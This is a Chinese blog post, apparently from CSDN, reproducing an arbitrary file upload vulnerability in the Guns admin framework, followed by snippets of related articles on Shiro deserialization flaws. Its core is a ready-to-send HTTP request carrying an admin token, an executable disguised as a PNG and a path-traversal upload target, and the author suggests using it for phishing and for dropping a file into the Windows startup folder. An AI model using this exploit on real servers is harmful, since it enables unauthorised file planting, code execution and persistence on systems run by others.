Guns后台任意文件上传漏洞

于 2025-01-13 22:00:34 发布
阅读量232 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/user_hs/article/details/145124918
版权

Guns后台任意文件上传漏洞

Guns后台任意文件上传漏洞

poc

POST /api/sysFileInfo/upload HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.91.1:9000/system/structure/user
Authorization: eyJhbGciOiJIUzUxMiJ9.eyJ1c2VySWQiOjEzMzk1NTA0Njc5Mzk2MzkyOTksImFjY291bnQiOiJhZG1pbiIsInV1aWQiOiI1NmQzZjczNy1hNjU1LTRjYzgtODRkNi0xNDdjYTE1M2Y5OGIiLCJyZW1lbWJlck1lIjpmYWxzZSwiZXhwaXJhdGlvbkRhdGUiOjE3MzUxMDM0MDM0ODgsImNhVG9rZW4iOm51bGwsIm90aGVycyI6bnVsbCwic3ViIjoiMTMzOTU1MDQ2NzkzOTYzOTI5OSIsImlhdCI6MTczNDQ5ODYwMywiZXhwIjoxNzM1MTAzNDAzfQ.Ur3bUwltSXWUtIT1OOR4MV4frJeRy_MDEkmYg99F5L2DOx6C4ha_y476dTWMy7gAJZsq5x_2C_VEkWxWv7uHXw
Content-Type: multipart/form-data; boundary=---------------------------4047569836919132683218702
Content-Length: 510
Origin: http://ip:9000
Connection: close

-----------------------------4047569836919132683218702
Content-Disposition: form-data; name="file"; filename=".exe"
Content-Type: image/png

1111
-----------------------------4047569836919132683218702
Content-Disposition: form-data; name="secretFlag"

N
-----------------------------4047569836919132683218702
Content-Disposition: form-data; name="fileBucket"

../../../../../../../../../../../../../../../../../../看到请点击exe备份
-----------------------------4047569836919132683218702--

可以用在钓鱼,如果项目在c盘,可以放到启动项中,

Guns快速开发平台 Shiro反序列化漏洞复现
0xSec
12-02 1317
Guns v5.1 及之前的版本存在shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。
GUNS框架登陆安全漏洞
qq_43081768的博客
09-02 2121
guns开源框架存在一定的登陆安全漏洞 最近为了快速搭建一个外挂小服务,为了图方便直接就用了GUNS开源框架,不得不说GUNS还是很好用的,页面权限管理,用户管理,用户角色管理,权限管理,部门管理等等,内置了挺多通用的服务的,用起来也是相当方便,改起来 也是蛮“香的”,为啥说登陆有漏洞呢,废话不多说,直接上干货: 1、用户 A 在登陆时 输入密码并且点击记住我,登陆成功后用户保存当前页面地址到 书签栏 然后使用完服务后没有点击退出登陆, 而是选择直接关闭网页,这时这个用户的session ...
Guns后台管理系统
07-17
Guns后台管理系统源代码。导入即可运行(数据库密码为root) Guns基于SpringBoot, 致力于做更简洁的后台管理系统,完美整合springmvc + shiro + mybatis-plus + beetl + flowable!
学习开源项目guns遇到的问题记录
weixin_30580943的博客
02-16 229
  启动guns项目(5.0)卡死在如下界面    原因不太明确: 最初是将logback-spring.xml 配置文件删除即可正常启动,后查找原因 不知为何springboot启动后默认激活 “dev” 配置而不是local配置,即使有下图配置,依然激活的是“dev”,最后将 pom.xml 和 application.yml有关dev的配置删除,则可正常启动; (...
gun linux 漏洞,所有Linux发行版仍未修复严重的GNU wget漏洞
weixin_36314729的博客
05-16 283
原标题:所有Linux发行版仍未修复严重的GNU wget漏洞 E安全7月8日讯 先前,安全研究员Dawid Golunski和SecuriTeam曝出GNU wget漏洞(CVE-2016-4971)。6月9日,GNU wget项目发布文件下载包新版1.18修复漏洞。CVE-2016-4971 漏洞回顾GUN wget 作为*nix 系统常用下载工具,支持http、https、ftp 等多种协议...
guns多租户支持bug处理
huaya1127的专栏
09-19 620
    今日研究guns开源框架的多租户功能的时候发现存在bug。租户建立成功,前端登录之后不能正常进入主页,研究之后发现是由于现有的默认服务端框架中在执行接口时未根据用户信息进行租户的数据源切换操作,造成在租户进入的情况下,还是访问主数据源的数据库。     修改方案为,在过滤器中直接进行数据源的切换工作。 具体操作为修改AuthJwtTokenSecurityInterceptor中的filterAction函数,增加切换数
Guns-v5.0升级Shiro至1.7并修复反序列化漏洞
资源摘要信息:"Guns-v5.0是一款针对后台管理系统开发的开源框架,经过此次更新,修复了原始版本中的Shiro反序列化漏洞。在Shiro组件升级至1.7版本后,该框架的安全性得到了显著提升。Guns框架的核心优势在于它易于...
OAuth 2.0 认证和攻击面
god_Zeo的安全博客
02-25 1520
攻击面主要是,CSRF绑定劫持漏洞,还有就是回调URL未校验,绕过校验,或者配合url跳转绕过啥的。
guns跳过测试
chouzhuiyou4848的博客
03-29 220
run as--->maven build--->填入clean package -Dmaven.test.skip=true 转载于:https://my.oschina.n...
Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
qq_46416934的博客
09-01 1339
系统将密钥硬编码在代码里,且在官方文档中并没有强调修改该密钥,导致框架使用者大多数都使用了默认密钥。检测漏洞:ShiroConfig.java 是否包含 fCq+/xW488hMTCD+cmJ3aQ==,如果是使用的默认密钥则需要修改,防止被执行命令攻击。升级版本到 >=v.4.3.1(其实就是升级Shiro版本到1.7),并且重新生成一个新的秘钥替换cipherKey,保证唯一且不要泄漏。升级Shiro版本到 >=1.7,在调用的地方重新生成一个新的秘钥替换。都存在漏洞建议升级到shiro1.7版本。..
stylefeng / Guns开发文档完整版
07-11
stylefeng / Guns开发文档完整版,V1.0的完整版,不是那种只有目录结构的,是真正的完整文档
guns 技术文档(完整版)
10-20
guns 完整版技术文档 技术文档 很有效 对guns框架深入了解
guns--技术--文档
07-24
guns--技术--文档 guns--技术--文档guns--技术--文档guns--技术--文档guns--技术--文档
关于Shiro反序列化漏洞的延伸—升级shiro也能被shell
jiangbb8686的博客
08-30 8385
首先感谢白帽子木板凳,本篇文章是对他提交的一个poc引发的思考。 0x00 概述 第一次接触shiro反序列化漏洞还是16年8月份,距离现在已经很久了,那时候只知道拿着个POC到处打,原理大致看过一下,也没太在意。 但是这次遇到一个问题——某些应用“将shiro升级到1.2.4之后的版本,还存在反序列化漏洞” 0x01 事件过程: 开始: 收到到一个漏洞和一段POC,发现是shiro反...
Shiro反序列化漏洞综合
FODKING的博客
09-07 987
Apache Shiro框架提供了记住我的功能(RememberMe),在服务器上存在反序列化漏洞
GUNS框架图片上传详解
weixin_42590334的博客
07-19 3598
1.html页面中的图片上传标签 2.对应html的js文件中 注意:只要保证上述图片三处红框跟定义的实体属性名保持一致即可。后台就可以拿到数据。 3.GUNS自定义avatar.tag标签 4.GUNS封装的js文件web-upload-object.js 5.UserMgrCointroller.java 6.编辑时获取之前上传的图片 参考第3点的红框路径,找到对应的Contro...
Guns二次开发(二):替换Guns自带的图片上传接口
weixin_42023666的博客
05-10 1805
因为我的项目中单独搭建了FastDFS文件服务器用于同一管理文件,而且实际需求中,我还需要往guns中添加我们自己的商品管理模块,我希望上传的商品图片能同一保存到文件服务器中,所以就需要替换掉guns自带的文件文件系统。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值